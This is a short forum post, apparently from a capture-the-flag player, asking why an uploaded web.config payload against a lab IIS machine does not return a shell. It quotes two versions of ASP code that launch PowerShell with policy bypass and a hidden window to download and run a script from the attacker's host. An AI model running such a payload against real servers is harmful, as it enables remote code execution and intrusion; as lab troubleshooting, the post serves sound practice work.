Using Burp Suite and Unicorn.py to create the exploit and upload it I’m not getting a shell. Followed IPPSECs write to the T, still same issue: have tried different iterations of this in the web.config file. It downloads the txt file from the HTTP server, but it never runs:
Tried this:
<%
Set rs = CreateObject(“Wscript.Shell”)
Set cmd = rs.Exec(“cmd /c powershell IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.23/bounty.txt’)”)
o = cmd.StdOut.Readall()
Response.write(o)
%>
Tired this:
<%
Set rs = CreateObject(“Wscript.Shell”)
Set cmd = rs.Exec("cmd /c “powershell -exec bypass -windowstyle hidden -noprofile IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.23/bounty.txt’)”)
o = cmd.StdOut.Readall()
Response.write(o)
%>